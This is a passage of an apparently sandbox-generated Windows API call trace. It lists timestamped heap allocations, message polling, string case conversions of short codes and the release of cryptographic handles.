lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.573] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0253.573] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.573] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0253.573] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0253.573] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.574] CryptDestroyKey (hKey=0xaa5660) returned 1 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.574] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0253.574] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0253.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0253.574] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0253.574] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0253.575] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0253.575] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.575] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0253.575] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0253.575] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.575] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0253.576] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.576] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.576] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0253.576] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0253.576] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.576] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0253.577] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.577] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0253.577] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0253.577] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.577] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0253.577] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.578] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0253.578] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0253.578] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0253.578] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.579] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0253.579] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.579] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0253.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0253.579] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0253.579] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0253.579] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0253.579] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.579] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0253.580] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.580] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.580] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.580] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.580] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.581] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.581] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.581] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0253.581] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.581] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.582] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.582] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.582] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.582] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0253.582] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.582] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0253.583] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.583] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.583] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0253.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0253.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: 